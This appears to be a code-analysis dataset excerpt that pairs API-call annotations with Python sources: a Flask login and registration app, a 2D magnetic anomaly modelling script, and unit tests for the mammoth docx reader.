| [
"cv2.rectangle",
"numpy.copy",
"cv2.drawContours",
"numpy.ones",
"cv2.inRange",
"cv2.contourArea",
"numpy.array",
"numpy.zeros",
"cv2.circle",
"cv2.waitKey",
"cv2.destroyAllWindows",
"cv2.cvtColor",
"cv2.moments",
"cv2.findContours",
"cv2.resize",
"cv2.imread",
"cv2.boundingRect"
] | [((74, 94), 'numpy.array', 'np.array', (['[80, 0, 0]'], {}), '([80, 0, 0])\n', (82, 94), True, 'import numpy as np\n'), ((110, 134), 'numpy.array', 'np.array', (['[90, 255, 255]'], {}), '([90, 255, 255])\n', (118, 134), True, 'import numpy as np\n'), ((1765, 1788), 'cv2.imread', 'cv2.imread', (['"""img/1.jpg"""'], {}), "('img/1.jpg')\n", (1775, 1788), False, 'import cv2\n'), ((173, 193), 'numpy.zeros', 'np.zeros', (['(500, 500)'], {}), '((500, 500))\n', (181, 193), True, 'import numpy as np\n'), ((235, 281), 'cv2.resize', 'cv2.resize', (['img', '(300, 300)', 'cv2.INTER_NEAREST'], {}), '(img, (300, 300), cv2.INTER_NEAREST)\n', (245, 281), False, 'import cv2\n'), ((296, 337), 'cv2.cvtColor', 'cv2.cvtColor', (['self.img', 'cv2.COLOR_BGR2HLS'], {}), '(self.img, cv2.COLOR_BGR2HLS)\n', (308, 337), False, 'import cv2\n'), ((359, 414), 'cv2.inRange', 'cv2.inRange', (['self.img', 'self.min_thresh', 'self.max_thresh'], {}), '(self.img, self.min_thresh, self.max_thresh)\n', (370, 414), False, 'import cv2\n'), ((433, 458), 'numpy.ones', 'np.ones', (['(5, 5)', 'np.uint8'], {}), '((5, 5), np.uint8)\n', (440, 458), True, 'import numpy as np\n'), ((555, 620), 'cv2.findContours', 'cv2.findContours', (['self.mask', 'cv2.RETR_TREE', 'cv2.CHAIN_APPROX_NONE'], {}), '(self.mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n', (571, 620), False, 'import cv2\n'), ((641, 658), 'numpy.copy', 'np.copy', (['self.img'], {}), '(self.img)\n', (648, 658), True, 'import numpy as np\n'), ((997, 1023), 'cv2.moments', 'cv2.moments', (['self.cnt_f[0]'], {}), '(self.cnt_f[0])\n', (1008, 1023), False, 'import cv2\n'), ((1115, 1141), 'cv2.moments', 'cv2.moments', (['self.cnt_f[1]'], {}), '(self.cnt_f[1])\n', (1126, 1141), False, 'import cv2\n'), ((1439, 1501), 'cv2.drawContours', 'cv2.drawContours', (['self.ret', 'self.cnt_f', '(-1)', '(150, 150, 255)', '(2)'], {}), '(self.ret, self.cnt_f, -1, (150, 150, 255), 2)\n', (1455, 1501), False, 'import cv2\n'), ((1517, 1571), 'cv2.circle', 'cv2.circle', (['self.ret', '(cx_1, cy_1)', '(2)', '(150, 155, 255)'], {}), '(self.ret, (cx_1, cy_1), 2, (150, 155, 255))\n', (1527, 1571), False, 'import cv2\n'), ((1587, 1641), 'cv2.circle', 'cv2.circle', (['self.ret', '(cx_2, cy_2)', '(2)', '(150, 155, 255)'], {}), '(self.ret, (cx_2, cy_2), 2, (150, 155, 255))\n', (1597, 1641), False, 'import cv2\n'), ((1657, 1707), 'cv2.circle', 'cv2.circle', (['self.ret', 'midpoint', '(2)', '(150, 255, 255)'], {}), '(self.ret, midpoint, 2, (150, 255, 255))\n', (1667, 1707), False, 'import cv2\n'), ((1936, 1986), 'cv2.resize', 'cv2.resize', (['ct.mask', '(500, 500)', 'cv2.INTER_NEAREST'], {}), '(ct.mask, (500, 500), cv2.INTER_NEAREST)\n', (1946, 1986), False, 'import cv2\n'), ((2102, 2116), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (2113, 2116), False, 'import cv2\n'), ((2142, 2165), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (2163, 2165), False, 'import cv2\n'), ((818, 839), 'cv2.boundingRect', 'cv2.boundingRect', (['cnt'], {}), '(cnt)\n', (834, 839), False, 'import cv2\n'), ((1842, 1881), 'cv2.cvtColor', 'cv2.cvtColor', (['ct.img', 'cv2.COLOR_HLS2BGR'], {}), '(ct.img, cv2.COLOR_HLS2BGR)\n', (1854, 1881), False, 'import cv2\n'), ((2023, 2062), 'cv2.cvtColor', 'cv2.cvtColor', (['ct.ret', 'cv2.COLOR_HLS2BGR'], {}), '(ct.ret, cv2.COLOR_HLS2BGR)\n', (2035, 2062), False, 'import cv2\n'), ((898, 961), 'cv2.rectangle', 'cv2.rectangle', (['self.ret', '(x, y)', '(x + w, y + h)', '(0, 255, 0)', '(2)'], {}), '(self.ret, (x, y), (x + w, y + h), (0, 255, 0), 2)\n', (911, 961), False, 'import cv2\n'), ((863, 883), 'cv2.contourArea', 'cv2.contourArea', (['cnt'], {}), '(cnt)\n', (878, 883), False, 'import cv2\n')] |
from flask import Flask
from flask import request
from flask import render_template
# Login Extension
from flask_login import LoginManager
from flask_login import login_required
from flask_login import login_user
from flask_login import logout_user
from mockdbhelper import MockDBHelper as DBHelper
from user import User
from flask import redirect
from flask import url_for
# Password Helper imports
from passwordhelper import PasswordHelper
# DB Helper instance
DB = DBHelper()
# Password Helper instance
PH = PasswordHelper()
# Creating a Flask App instance
app = Flask(__name__)
# Set a secret key for you application
app.secret_key = '<KEY>'
login_manager = LoginManager(app)
@app.route("/")
def home():
return render_template("home.html")
@app.route("/account")
@login_required
def account():
return "You're logged in"
@login_manager.user_loader
def load_user(user_id):
user_password = DB.get_user(user_id)
if user_password:
return User(user_id)
@app.route("/login", methods=["POST"])
def login():
email = request.form.get("email")
password = request.form.get("password")
stored_user = DB.get_user(email)
if stored_user and PH.validate_password(password, stored_user['salt'], stored_user['hashed']):
user = User(email)
login_user(user, remember=True)
return redirect(url_for('account'))
# user_password = DB.get_user(email)
# if user_password and user_password == password:
# user = User(email)
# login_user(user)
# return redirect(url_for('account'))
# return account()
return home()
# Register function
@app.route("/register" , methods=["POST"])
def register():
email = request.form.get("email")
password = request.form.get("password")
confirmpass = request.form.get("password2")
if not password == confirmpass:
return redirect(url_for('home'))
if DB.get_user(email):
return redirect(url_for('home'))
salt = PH.get_salt()
hashed = PH.get_hash(password + salt)
DB.add_user(email, salt, hashed)
return redirect(url_for('home'))
@app.route("/logout")
def logout():
logout_user()
return redirect(url_for("home"))
if __name__ == '__main__':
app.run(port=5000, debug=True)
| [
"flask.render_template",
"flask_login.LoginManager",
"flask.Flask",
"flask_login.login_user",
"flask_login.logout_user",
"mockdbhelper.MockDBHelper",
"flask.request.form.get",
"passwordhelper.PasswordHelper",
"flask.url_for",
"user.User"
] | [((474, 484), 'mockdbhelper.MockDBHelper', 'DBHelper', ([], {}), '()\n', (482, 484), True, 'from mockdbhelper import MockDBHelper as DBHelper\n'), ((518, 534), 'passwordhelper.PasswordHelper', 'PasswordHelper', ([], {}), '()\n', (532, 534), False, 'from passwordhelper import PasswordHelper\n'), ((576, 591), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (581, 591), False, 'from flask import Flask\n'), ((674, 691), 'flask_login.LoginManager', 'LoginManager', (['app'], {}), '(app)\n', (686, 691), False, 'from flask_login import LoginManager\n'), ((733, 761), 'flask.render_template', 'render_template', (['"""home.html"""'], {}), "('home.html')\n", (748, 761), False, 'from flask import render_template\n'), ((1056, 1081), 'flask.request.form.get', 'request.form.get', (['"""email"""'], {}), "('email')\n", (1072, 1081), False, 'from flask import request\n'), ((1097, 1125), 'flask.request.form.get', 'request.form.get', (['"""password"""'], {}), "('password')\n", (1113, 1125), False, 'from flask import request\n'), ((1707, 1732), 'flask.request.form.get', 'request.form.get', (['"""email"""'], {}), "('email')\n", (1723, 1732), False, 'from flask import request\n'), ((1748, 1776), 'flask.request.form.get', 'request.form.get', (['"""password"""'], {}), "('password')\n", (1764, 1776), False, 'from flask import request\n'), ((1795, 1824), 'flask.request.form.get', 'request.form.get', (['"""password2"""'], {}), "('password2')\n", (1811, 1824), False, 'from flask import request\n'), ((2153, 2166), 'flask_login.logout_user', 'logout_user', ([], {}), '()\n', (2164, 2166), False, 'from flask_login import logout_user\n'), ((977, 990), 'user.User', 'User', (['user_id'], {}), '(user_id)\n', (981, 990), False, 'from user import User\n'), ((1277, 1288), 'user.User', 'User', (['email'], {}), '(email)\n', (1281, 1288), False, 'from user import User\n'), ((1297, 1328), 'flask_login.login_user', 'login_user', (['user'], {'remember': '(True)'}), '(user, remember=True)\n', (1307, 1328), False, 'from flask_login import login_user\n'), ((2095, 2110), 'flask.url_for', 'url_for', (['"""home"""'], {}), "('home')\n", (2102, 2110), False, 'from flask import url_for\n'), ((2187, 2202), 'flask.url_for', 'url_for', (['"""home"""'], {}), "('home')\n", (2194, 2202), False, 'from flask import url_for\n'), ((1353, 1371), 'flask.url_for', 'url_for', (['"""account"""'], {}), "('account')\n", (1360, 1371), False, 'from flask import url_for\n'), ((1885, 1900), 'flask.url_for', 'url_for', (['"""home"""'], {}), "('home')\n", (1892, 1900), False, 'from flask import url_for\n'), ((1953, 1968), 'flask.url_for', 'url_for', (['"""home"""'], {}), "('home')\n", (1960, 1968), False, 'from flask import url_for\n')] |
import sys
# in this case local import
sys.path.append("../")
import mag2dpoly as mag
import numpy as np
# induced magnetization
Jind = mag.MagnetizVector(mod=4.9,Ideg=90.0,Ddeg=45.0)
# remanent magnetization
Jrem = mag.MagnetizVector(mod=3.1,Ideg=45.0,Ddeg=0.0)
# angle with the North axis
northxax = 90.0
# number of observation
Nobs = 101
xzobs = np.transpose(np.vstack(( np.linspace(0.0,100.0,Nobs), -1.0*np.ones(Nobs))))
# vertices of the poligonal bodies
vertices = np.array([ [35.0, 50.0],
[65.0, 50.0],
[80.0, 35.0],
[65.0, 20.0],
[35.0, 20.0],
[20.0, 35.0] ])
# indices of vertices for the body
nbod = 1
bodyindices = np.empty(shape=(nbod,), dtype=np.object)
inds = range(6)
bodyindices[0] = np.array(inds)
# construct the poligonal body object
pbody = mag.MagPolyBodies2D(bodyindices,vertices)
# type of forward algorithm
forwardtype = "talwani"
# compute total field
# make Jind and Jrem arrays of objects (as many as there are bodies)
Jindv = np.array([Jind]) # we have one single body in this case
Jremv = np.array([Jrem]) # we have one single body in this case
tmag = mag.tmagpolybodies2Dgen(xzobs,Jindv,Jremv,northxax,pbody,forwardtype)
## plot
import matplotlib.pyplot as plt
plt.figure()
plt.subplot(211)
plt.title("Magnetic anomaly")
plt.plot(xzobs[:,0],tmag,"o-")
plt.subplot(212)
plt.title("Polygonal body")
x = np.append(pbody.bo[0].ver1[:,0],pbody.bo[0].ver1[0,0])
y = np.append(pbody.bo[0].ver1[:,1],pbody.bo[0].ver1[0,1])
plt.plot(x,y,"o-")
plt.show()
| [
"numpy.ones",
"mag2dpoly.tmagpolybodies2Dgen",
"mag2dpoly.MagnetizVector",
"mag2dpoly.MagPolyBodies2D",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.subplot",
"numpy.array",
"matplotlib.pyplot.figure",
"numpy.append",
"numpy.empty",
"numpy.linspace",
"matplotlib.pyplot.title",
"sys.path.appe... | [((41, 63), 'sys.path.append', 'sys.path.append', (['"""../"""'], {}), "('../')\n", (56, 63), False, 'import sys\n'), ((141, 190), 'mag2dpoly.MagnetizVector', 'mag.MagnetizVector', ([], {'mod': '(4.9)', 'Ideg': '(90.0)', 'Ddeg': '(45.0)'}), '(mod=4.9, Ideg=90.0, Ddeg=45.0)\n', (159, 190), True, 'import mag2dpoly as mag\n'), ((221, 269), 'mag2dpoly.MagnetizVector', 'mag.MagnetizVector', ([], {'mod': '(3.1)', 'Ideg': '(45.0)', 'Ddeg': '(0.0)'}), '(mod=3.1, Ideg=45.0, Ddeg=0.0)\n', (239, 269), True, 'import mag2dpoly as mag\n'), ((480, 579), 'numpy.array', 'np.array', (['[[35.0, 50.0], [65.0, 50.0], [80.0, 35.0], [65.0, 20.0], [35.0, 20.0], [\n 20.0, 35.0]]'], {}), '([[35.0, 50.0], [65.0, 50.0], [80.0, 35.0], [65.0, 20.0], [35.0, \n 20.0], [20.0, 35.0]])\n', (488, 579), True, 'import numpy as np\n'), ((746, 786), 'numpy.empty', 'np.empty', ([], {'shape': '(nbod,)', 'dtype': 'np.object'}), '(shape=(nbod,), dtype=np.object)\n', (754, 786), True, 'import numpy as np\n'), ((820, 834), 'numpy.array', 'np.array', (['inds'], {}), '(inds)\n', (828, 834), True, 'import numpy as np\n'), ((882, 924), 'mag2dpoly.MagPolyBodies2D', 'mag.MagPolyBodies2D', (['bodyindices', 'vertices'], {}), '(bodyindices, vertices)\n', (901, 924), True, 'import mag2dpoly as mag\n'), ((1078, 1094), 'numpy.array', 'np.array', (['[Jind]'], {}), '([Jind])\n', (1086, 1094), True, 'import numpy as np\n'), ((1142, 1158), 'numpy.array', 'np.array', (['[Jrem]'], {}), '([Jrem])\n', (1150, 1158), True, 'import numpy as np\n'), ((1205, 1279), 'mag2dpoly.tmagpolybodies2Dgen', 'mag.tmagpolybodies2Dgen', (['xzobs', 'Jindv', 'Jremv', 'northxax', 'pbody', 'forwardtype'], {}), '(xzobs, Jindv, Jremv, northxax, pbody, forwardtype)\n', (1228, 1279), True, 'import mag2dpoly as mag\n'), ((1318, 1330), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1328, 1330), True, 'import matplotlib.pyplot as plt\n'), ((1331, 1347), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(211)'], {}), '(211)\n', (1342, 1347), True, 'import matplotlib.pyplot as plt\n'), ((1348, 1377), 'matplotlib.pyplot.title', 'plt.title', (['"""Magnetic anomaly"""'], {}), "('Magnetic anomaly')\n", (1357, 1377), True, 'import matplotlib.pyplot as plt\n'), ((1378, 1411), 'matplotlib.pyplot.plot', 'plt.plot', (['xzobs[:, 0]', 'tmag', '"""o-"""'], {}), "(xzobs[:, 0], tmag, 'o-')\n", (1386, 1411), True, 'import matplotlib.pyplot as plt\n'), ((1409, 1425), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(212)'], {}), '(212)\n', (1420, 1425), True, 'import matplotlib.pyplot as plt\n'), ((1426, 1453), 'matplotlib.pyplot.title', 'plt.title', (['"""Polygonal body"""'], {}), "('Polygonal body')\n", (1435, 1453), True, 'import matplotlib.pyplot as plt\n'), ((1458, 1515), 'numpy.append', 'np.append', (['pbody.bo[0].ver1[:, 0]', 'pbody.bo[0].ver1[0, 0]'], {}), '(pbody.bo[0].ver1[:, 0], pbody.bo[0].ver1[0, 0])\n', (1467, 1515), True, 'import numpy as np\n'), ((1517, 1574), 'numpy.append', 'np.append', (['pbody.bo[0].ver1[:, 1]', 'pbody.bo[0].ver1[0, 1]'], {}), '(pbody.bo[0].ver1[:, 1], pbody.bo[0].ver1[0, 1])\n', (1526, 1574), True, 'import numpy as np\n'), ((1572, 1592), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y', '"""o-"""'], {}), "(x, y, 'o-')\n", (1580, 1592), True, 'import matplotlib.pyplot as plt\n'), ((1591, 1601), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1599, 1601), True, 'import matplotlib.pyplot as plt\n'), ((382, 411), 'numpy.linspace', 'np.linspace', (['(0.0)', '(100.0)', 'Nobs'], {}), '(0.0, 100.0, Nobs)\n', (393, 411), True, 'import numpy as np\n'), ((416, 429), 'numpy.ones', 'np.ones', (['Nobs'], {}), '(Nobs)\n', (423, 429), True, 'import numpy as np\n')] |
import io
from nose.tools import istest, assert_equal
import funk
from mammoth import documents, results
from mammoth.docx.xmlparser import element as xml_element, text as xml_text
from mammoth.docx.document_xml import read_document_xml_element
from mammoth.docx.numbering_xml import Numbering
from mammoth.docx.relationships_xml import Relationships, Relationship
@istest
class ReadXmlElementTests(object):
@istest
def text_from_text_element_is_read(self):
element = _text_element("Hello!")
assert_equal(documents.Text("Hello!"), _read_and_get_document_xml_element(element))
@istest
def can_read_text_within_run(self):
element = _run_element_with_text("Hello!")
assert_equal(
documents.run([documents.Text("Hello!")]),
_read_and_get_document_xml_element(element)
)
@istest
def can_read_text_within_paragraph(self):
element = _paragraph_element_with_text("Hello!")
assert_equal(
documents.paragraph([documents.run([documents.Text("Hello!")])]),
_read_and_get_document_xml_element(element)
)
@istest
def can_read_text_within_document(self):
element = _document_element_with_text("Hello!")
assert_equal(
documents.Document([documents.paragraph([documents.run([documents.Text("Hello!")])])]),
_read_and_get_document_xml_element(element)
)
@istest
def paragraph_has_no_style_if_it_has_no_properties(self):
element = xml_element("w:p")
assert_equal(None, _read_and_get_document_xml_element(element).style_name)
@istest
def paragraph_has_style_name_read_from_paragraph_properties_if_present(self):
style_xml = xml_element("w:pStyle", {"w:val": "Heading1"})
properties_xml = xml_element("w:pPr", {}, [style_xml])
paragraph_xml = xml_element("w:p", {}, [properties_xml])
paragraph = _read_and_get_document_xml_element(paragraph_xml)
assert_equal("Heading1", paragraph.style_name)
@istest
def paragraph_has_no_numbering_if_it_has_no_numbering_properties(self):
element = xml_element("w:p")
assert_equal(None, _read_and_get_document_xml_element(element).numbering)
@istest
def paragraph_has_numbering_properties_from_paragraph_properties_if_present(self):
numbering_properties_xml = xml_element("w:numPr", {}, [
xml_element("w:ilvl", {"w:val": "1"}),
xml_element("w:numId", {"w:val": "42"}),
])
properties_xml = xml_element("w:pPr", {}, [numbering_properties_xml])
paragraph_xml = xml_element("w:p", {}, [properties_xml])
numbering = Numbering({"42": {"1": documents.numbering_level("1", True)}})
paragraph = _read_and_get_document_xml_element(paragraph_xml, numbering=numbering)
assert_equal("1", paragraph.numbering.level_index)
assert_equal(True, paragraph.numbering.is_ordered)
@istest
def run_has_no_style_if_it_has_no_properties(self):
element = xml_element("w:r")
assert_equal(None, _read_and_get_document_xml_element(element).style_name)
@istest
def run_has_style_name_read_from_run_properties_if_present(self):
style_xml = xml_element("w:rStyle", {"w:val": "Emphasis"})
run = self._read_run_with_properties([style_xml])
assert_equal("Emphasis", run.style_name)
@istest
def run_is_not_bold_if_bold_element_is_not_present(self):
run = self._read_run_with_properties([])
assert_equal(False, run.is_bold)
@istest
def run_is_bold_if_bold_element_is_present(self):
run = self._read_run_with_properties([xml_element("w:b")])
assert_equal(True, run.is_bold)
@istest
def run_is_not_italic_if_italic_element_is_not_present(self):
run = self._read_run_with_properties([])
assert_equal(False, run.is_italic)
@istest
def run_is_italic_if_italic_element_is_present(self):
run = self._read_run_with_properties([xml_element("w:i")])
assert_equal(True, run.is_italic)
def _read_run_with_properties(self, properties):
properties_xml = xml_element("w:rPr", {}, properties)
run_xml = xml_element("w:r", {}, [properties_xml])
return _read_and_get_document_xml_element(run_xml)
@istest
def can_read_tab_element(self):
element = xml_element("w:tab")
tab = _read_and_get_document_xml_element(element)
assert_equal(documents.tab(), tab)
@istest
def children_of_w_ins_are_converted_normally(self):
element = xml_element("w:p", {}, [
xml_element("w:ins", {}, [
xml_element("w:r")
])
])
assert_equal(
documents.paragraph([documents.run([])]),
_read_and_get_document_xml_element(element)
)
@istest
def children_of_w_smart_tag_are_converted_normally(self):
element = xml_element("w:p", {}, [
xml_element("w:smartTag", {}, [
xml_element("w:r")
])
])
assert_equal(
documents.paragraph([documents.run([])]),
_read_and_get_document_xml_element(element)
)
@istest
def hyperlink_is_read_if_it_has_a_relationship_id(self):
relationships = Relationships({
"r42": Relationship(target="http://example.com")
})
run_element = xml_element("w:r")
element = xml_element("w:hyperlink", {"r:id": "r42"}, [run_element])
assert_equal(
documents.hyperlink("http://example.com", [documents.run([])]),
_read_and_get_document_xml_element(element, relationships=relationships)
)
@istest
def hyperlink_is_ignored_if_it_does_not_have_a_relationship_id(self):
run_element = xml_element("w:r")
element = xml_element("w:hyperlink", {}, [run_element])
assert_equal(
[documents.run([])],
_read_and_get_document_xml_element(element)
)
@istest
@funk.with_context
def can_read_inline_pictures(self, context):
drawing_element = _create_inline_image(
relationship_id="rId5",
description="It's a hat",
)
image_bytes = b"Not an image at all!"
relationships = Relationships({
"rId5": Relationship(target="media/hat.png")
})
docx_file = context.mock()
funk.allows(docx_file).open("word/media/hat.png").returns(io.BytesIO(image_bytes))
content_types = context.mock()
funk.allows(content_types).find_content_type("word/media/hat.png").returns("image/png")
image = _read_and_get_document_xml_element(
drawing_element,
content_types=content_types,
relationships=relationships,
docx_file=docx_file,
)[0]
assert_equal(documents.Image, type(image))
assert_equal("It's a hat", image.alt_text)
assert_equal("image/png", image.content_type)
with image.open() as image_file:
assert_equal(image_bytes, image_file.read())
@istest
@funk.with_context
def can_read_anchored_pictures(self, context):
drawing_element = _create_anchored_image(
relationship_id="rId5",
description="It's a hat",
)
image_bytes = b"Not an image at all!"
relationships = Relationships({
"rId5": Relationship(target="media/hat.png")
})
docx_file = context.mock()
funk.allows(docx_file).open("word/media/hat.png").returns(io.BytesIO(image_bytes))
content_types = context.mock()
funk.allows(content_types).find_content_type("word/media/hat.png").returns("image/png")
image = _read_and_get_document_xml_element(
drawing_element,
content_types=content_types,
relationships=relationships,
docx_file=docx_file,
)[0]
assert_equal(documents.Image, type(image))
assert_equal("It's a hat", image.alt_text)
assert_equal("image/png", image.content_type)
with image.open() as image_file:
assert_equal(image_bytes, image_file.read())
@istest
def ignored_elements_are_ignored_without_message(self):
element = xml_element("w:bookmarkStart")
result = read_document_xml_element(element)
assert_equal(None, result.value)
assert_equal([], result.messages)
@istest
def unrecognised_elements_emit_warning(self):
element = xml_element("w:huh", {}, [])
result = read_document_xml_element(element)
expected_warning = results.warning("An unrecognised element was ignored: w:huh")
assert_equal([expected_warning], result.messages)
@istest
def unrecognised_elements_are_ignored(self):
element = xml_element("w:huh", {}, [])
assert_equal(None, read_document_xml_element(element).value)
@istest
def unrecognised_children_are_ignored(self):
element = xml_element("w:r", {}, [_text_element("Hello!"), xml_element("w:huh", {}, [])])
assert_equal(
documents.run([documents.Text("Hello!")]),
read_document_xml_element(element).value
)
def _read_and_get_document_xml_element(*args, **kwargs):
result = read_document_xml_element(*args, **kwargs)
assert_equal([], result.messages)
return result.value
def _document_element_with_text(text):
return xml_element("w:document", {}, [
xml_element("w:body", {}, [_paragraph_element_with_text(text)])
])
def _paragraph_element_with_text(text):
return xml_element("w:p", {}, [_run_element_with_text(text)])
def _run_element_with_text(text):
return xml_element("w:r", {}, [_text_element(text)])
def _text_element(value):
return xml_element("w:t", {}, [xml_text(value)])
def _create_inline_image(description, relationship_id):
return xml_element("w:drawing", {}, [
xml_element("wp:inline", {}, _create_image_elements(description, relationship_id))
])
def _create_anchored_image(description, relationship_id):
return xml_element("w:drawing", {}, [
xml_element("wp:anchor", {}, _create_image_elements(description, relationship_id))
])
def _create_image_elements(description, relationship_id):
return [
xml_element("wp:docPr", {"descr": description}),
xml_element("a:graphic", {}, [
xml_element("a:graphicData", {}, [
xml_element("pic:pic", {}, [
xml_element("pic:blipFill", {}, [
xml_element("a:blip", {"r:embed": relationship_id})
])
])
])
])
]
| [
"mammoth.docx.document_xml.read_document_xml_element",
"mammoth.documents.run",
"mammoth.docx.relationships_xml.Relationship",
"mammoth.results.warning",
"funk.allows",
"io.BytesIO",
"mammoth.docx.xmlparser.text",
"mammoth.documents.numbering_level",
"mammoth.documents.Text",
"nose.tools.assert_eq... | [((9630, 9672), 'mammoth.docx.document_xml.read_document_xml_element', 'read_document_xml_element', (['*args'], {}), '(*args, **kwargs)\n', (9655, 9672), False, 'from mammoth.docx.document_xml import read_document_xml_element\n'), ((9677, 9710), 'nose.tools.assert_equal', 'assert_equal', (['[]', 'result.messages'], {}), '([], result.messages)\n', (9689, 9710), False, 'from nose.tools import istest, assert_equal\n'), ((1548, 1566), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:p"""'], {}), "('w:p')\n", (1559, 1566), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((1773, 1819), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:pStyle"""', "{'w:val': 'Heading1'}"], {}), "('w:pStyle', {'w:val': 'Heading1'})\n", (1784, 1819), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((1845, 1882), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:pPr"""', '{}', '[style_xml]'], {}), "('w:pPr', {}, [style_xml])\n", (1856, 1882), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((1907, 1947), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:p"""', '{}', '[properties_xml]'], {}), "('w:p', {}, [properties_xml])\n", (1918, 1947), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((2026, 2072), 'nose.tools.assert_equal', 'assert_equal', (['"""Heading1"""', 'paragraph.style_name'], {}), "('Heading1', paragraph.style_name)\n", (2038, 2072), False, 'from nose.tools import istest, assert_equal\n'), ((2188, 2206), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:p"""'], {}), "('w:p')\n", (2199, 2206), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((2601, 2653), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:pPr"""', '{}', '[numbering_properties_xml]'], {}), "('w:pPr', {}, [numbering_properties_xml])\n", (2612, 2653), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((2678, 2718), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:p"""', '{}', '[properties_xml]'], {}), "('w:p', {}, [properties_xml])\n", (2689, 2718), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((2919, 2969), 'nose.tools.assert_equal', 'assert_equal', (['"""1"""', 'paragraph.numbering.level_index'], {}), "('1', paragraph.numbering.level_index)\n", (2931, 2969), False, 'from nose.tools import istest, assert_equal\n'), ((2978, 3028), 'nose.tools.assert_equal', 'assert_equal', (['(True)', 'paragraph.numbering.is_ordered'], {}), '(True, paragraph.numbering.is_ordered)\n', (2990, 3028), False, 'from nose.tools import istest, assert_equal\n'), ((3120, 3138), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:r"""'], {}), "('w:r')\n", (3131, 3138), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((3333, 3379), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:rStyle"""', "{'w:val': 'Emphasis'}"], {}), "('w:rStyle', {'w:val': 'Emphasis'})\n", (3344, 3379), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((3446, 3486), 'nose.tools.assert_equal', 'assert_equal', (['"""Emphasis"""', 'run.style_name'], {}), "('Emphasis', run.style_name)\n", (3458, 3486), False, 'from nose.tools import istest, assert_equal\n'), ((3627, 3659), 'nose.tools.assert_equal', 'assert_equal', (['(False)', 'run.is_bold'], {}), '(False, run.is_bold)\n', (3639, 3659), False, 'from nose.tools import istest, assert_equal\n'), ((3806, 3837), 'nose.tools.assert_equal', 'assert_equal', (['(True)', 'run.is_bold'], {}), '(True, run.is_bold)\n', (3818, 3837), False, 'from nose.tools import istest, assert_equal\n'), ((3982, 4016), 'nose.tools.assert_equal', 'assert_equal', (['(False)', 'run.is_italic'], {}), '(False, run.is_italic)\n', (3994, 4016), False, 'from nose.tools import istest, assert_equal\n'), ((4167, 4200), 'nose.tools.assert_equal', 'assert_equal', (['(True)', 'run.is_italic'], {}), '(True, run.is_italic)\n', (4179, 4200), False, 'from nose.tools import istest, assert_equal\n'), ((4284, 4320), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:rPr"""', '{}', 'properties'], {}), "('w:rPr', {}, properties)\n", (4295, 4320), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((4339, 4379), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:r"""', '{}', '[properties_xml]'], {}), "('w:r', {}, [properties_xml])\n", (4350, 4379), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((4507, 4527), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:tab"""'], {}), "('w:tab')\n", (4518, 4527), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((5580, 5598), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:r"""'], {}), "('w:r')\n", (5591, 5598), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((5617, 5675), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:hyperlink"""', "{'r:id': 'r42'}", '[run_element]'], {}), "('w:hyperlink', {'r:id': 'r42'}, [run_element])\n", (5628, 5675), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((5986, 6004), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:r"""'], {}), "('w:r')\n", (5997, 6004), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((6023, 6068), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:hyperlink"""', '{}', '[run_element]'], {}), "('w:hyperlink', {}, [run_element])\n", (6034, 6068), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((7152, 7194), 'nose.tools.assert_equal', 'assert_equal', (['"""It\'s a hat"""', 'image.alt_text'], {}), '("It\'s a hat", image.alt_text)\n', (7164, 7194), False, 'from nose.tools import istest, assert_equal\n'), ((7203, 7248), 'nose.tools.assert_equal', 'assert_equal', (['"""image/png"""', 'image.content_type'], {}), "('image/png', image.content_type)\n", (7215, 7248), False, 'from nose.tools import istest, assert_equal\n'), ((8304, 8346), 'nose.tools.assert_equal', 'assert_equal', (['"""It\'s a hat"""', 'image.alt_text'], {}), '("It\'s a hat", image.alt_text)\n', (8316, 8346), False, 'from nose.tools import istest, assert_equal\n'), ((8355, 8400), 'nose.tools.assert_equal', 'assert_equal', (['"""image/png"""', 'image.content_type'], {}), "('image/png', image.content_type)\n", (8367, 8400), False, 'from nose.tools import istest, assert_equal\n'), ((8594, 